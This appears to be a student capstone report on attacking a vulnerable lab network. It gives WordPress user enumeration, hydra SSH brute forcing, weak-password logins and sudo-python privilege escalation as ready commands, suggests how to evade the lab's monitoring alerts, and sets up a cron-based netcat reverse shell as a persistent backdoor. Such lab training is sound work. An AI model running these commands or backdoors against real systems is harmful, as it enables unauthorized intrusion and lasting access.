1 of 17

Final Engagement

Attack, Defense & Analysis of a Vulnerable Network

1

Group: Conor, Josh, Diamond, Austin, Natasha, and Fahrad

2 of 17

Table of Contents

This document contains the following resources:

Network Topology & Critical Vulnerabilities

Exploits Used

Methods Used to Avoid Detection

2

01

02

03

3 of 17

Network Topology

& Critical Vulnerabilities

3

4 of 17

Network Topology

4

Network
Address Range: 192.168.1.0/24 Netmask: 255.255.255.0 Gateway: 192.168.1.1

Machines
IPv4: 192.168.1.90 OS: Debian Kali 5.4.0 Hostname: Kali	IPv4: 192.168.1.105 OS: Ubuntu 18.04.1 LTS Hostname: Capstone	IPv4: 192.168.1.100 OS: Ubuntu 18.04.4 LTS Hostname: ELK	IPv4: 192.168.1.115 OS: Debian GNU/Linux 8 Hostname: Target1

5 of 17

Critical Vulnerabilities: Target 1

Our assessment uncovered the following critical vulnerabilities in Target 1.

5

Vulnerability	Description	Impact
Port Scanning/User Enumeration	Used nmap to discover machiners on the network. Used WPscan to access a list of usernames on target1.	Allows attackers to gain access to list of usernames on the web server
Brute Force/Weak Passwords	Was able to guess Michael’s password	Allows attackers to login to the web server
Hydra SSH Attack	Used hydra to crack password	Allows attackers to crack passwords
Privilege Escalation	Escalated Steven to root by using a sudo Python command	Allows attackers to escalate a normal user to root

6 of 17

Exploits Used

6

7 of 17

Exploitation: User Enumeration

Using wordpress we were able to exploit the vulnerability, by wpscan command:

- wpscan --url http://192.168.1.110/wordpress --enumerate u

The exploit achieved: wpscan remotely scans to find vulnerabilities in the WordPress website, which can also be used from an attacker standpoint.
The following screenshot shows the exploit:

7

8 of 17

Exploitation: Brute Force/Weak Passwords

Summarize the following:

The vulnerability that was easiest to exploit was Michael’s weak password. Considering it was a very weak (password: michael).
The exploit achieved: SSH into the user Michael to gain root access, which allowed the attacker access to the web server.

8

The following commands should be followed in this sequence to obtain root access to the user Michael:

Enter ‘ssh michael@192.168.1.110’ within Kali.
Next it will prompt you to enter the password: michael
cd var/www/html
ls -l
nano service.html (can find flag 1 here)

9 of 17

Exploitation: Hydra SSH Attack

By utilizing the hydra command we were able to exploit the user Michael’s password:

hydra -l michael -P /usr/share/wordlists/rockyou.txt -s 22 -f -vV 192.168.1.110 ssh

The exploit achieved: Ability to find Michael’s password.

9

10 of 17

Exploitation: Privilege Escalation

Summarize the following:

The exploit that was utilized was a Python Privilege Escalation vulnerability

sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

The exploit allowed for root access to be granted. Allowing for the final flag to be found.

Commands:

ssh steven@192.168.1.110
password: pink84
sudo -l
sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
cd /root
ls
cat flag4.txt

10

11 of 17

Avoiding Detection

11

12 of 17

Stealth Exploitation of User Enumeration

Monitoring Overview

Which alerts detect this exploit? Excessive HTTP Errors alert
Which metrics do they measure? WHEN count() GROUPED OVER top 5 'http.response.status_code'
Which thresholds do they fire at? 400+ error codes within 5 minutes

Mitigating Detection

How can you execute the same exploit without triggering the alert?

There is a more stealthy alternative wpscan command which can avoid triggering alerts

Command: “wpscan --stealthy --url http://192.168.1.110/wordpress u

Are there alternative exploits that may perform better?

Social engineering such as using authority or urgency to have a user disclose their info.

12

13 of 17

Stealth Exploitation of Brute Force/Weak Passwords

Monitoring Overview

Which alerts detect this exploit: Excessive HTTP Errors
Which metrics do they measure: WHEN count() GROUPED OVER top 5 'http.response.status_code'
Which thresholds do they fire at: 400+ error codes within 5 minutes

Mitigating Detection

How can you execute the same exploit without triggering the alert? Brute forcing attack over a longer period of time

We could have achieved the same results by guessing the password. As the password is a weak password being the same as the users username. (Username: micheal, Password: michael)

Are there alternative exploits that may perform better? phishing emails

Alternatively we could have sent a Phishing Email to trick michael into giving us his password.

13

14 of 17

Stealth Exploitation of Open Port Scanning

Monitoring Overview

Which alerts detect this exploit? Excessive HTTP Errors Alert

& HTTP Request Size Monitor

Which metrics do they measure?

WHEN count() GROUPED OVER top 5 'http.response.status_code'

& WHEN sum() of http.request.bytes OVER all documents

Which thresholds do they fire at? Excessive HTTP Errors is 400+ error

codes within 5 minutes while HTTP Request Size Monitor is above

3500 requests within 1 minute

Mitigating Detection

How can you execute the same exploit without triggering the alert? There are

multiple types of scan to run that are more stealthy such as NULL scan, FIN, and X-MAS scan

Are there alternative exploits that may perform better? Use Nessus instead of NMAP

14

Josh

FIN Scan - Some packet loggers and firewalls are configured to detect SYN packets to restricted ports. In the FIN scan, a packet is sent with just the FIN flag set. If the port is closed, the host sends back a RST flag, whereas an open port simply ignores the packet and nothing is returned to the client. This is required behaviour as set out in the RFC for Transmission Control Protocol. [6] It is through exploiting the requirement that TCP has for ensuring packets arrive at their destination that attackers can probe open ports and possibly evade detection. Because a firewall or packet logger may be setup to detect SYN packets, a FIN packet would slip through unnoticed

Null Scan - Instead of turning on flags in the header that would cause the packet to be received by the host as an invalid packet, the Null scan turns off all header flags. [5] This again causes a RST packet to be sent to the client if a port is closed, but is ignored if the port is open. Microsoft operating systems in addition to a number of others have ignored the RFC for TCP and have implemented it somewhat differently than the standard. This causes the FIN, Xmas tree, and Null scans to fail on Windows based operating systems, and others such as Cisco, HP/UX, and IRIX. These operating systems all send a RST if the port is open instead of ignoring the packet.

Xmas Tree Scan - Like the FIN scan, the Xmas tree scan employs the use of invalid packet header flags to elicit a response from a host regarding open ports. There are a few different methods that have been applied that all use the Xmas tree scan name. Nmap executes the Xmas tree scan using 3 packet header flags, which are the FIN, URG (Urgent), and PSH (Push) flags. [3] This type of scan is very similar to the FIN scan, with 2 extra flags set. Other Xmas tree scanners set all TCP header flags to be on, which is most likely where the name is from. Like FIN scan, a closed port will return a RST packet, whereas an open port will ignore the packet.

15 of 17

Maintaining Access

15

16 of 17

Persistent backdoor.

Backdoor Overview:

Once we gained root access into the steven account. We setup a cronjob that will periodically send a reverse shell back into our Attack Machine.

“ * * * * * nc -e /bin/bash 192.168.1.90 4444 “

We can connect to the machine with a netcat session

nc -lvnp 4444

16

17 of 17

17

END OF REPORT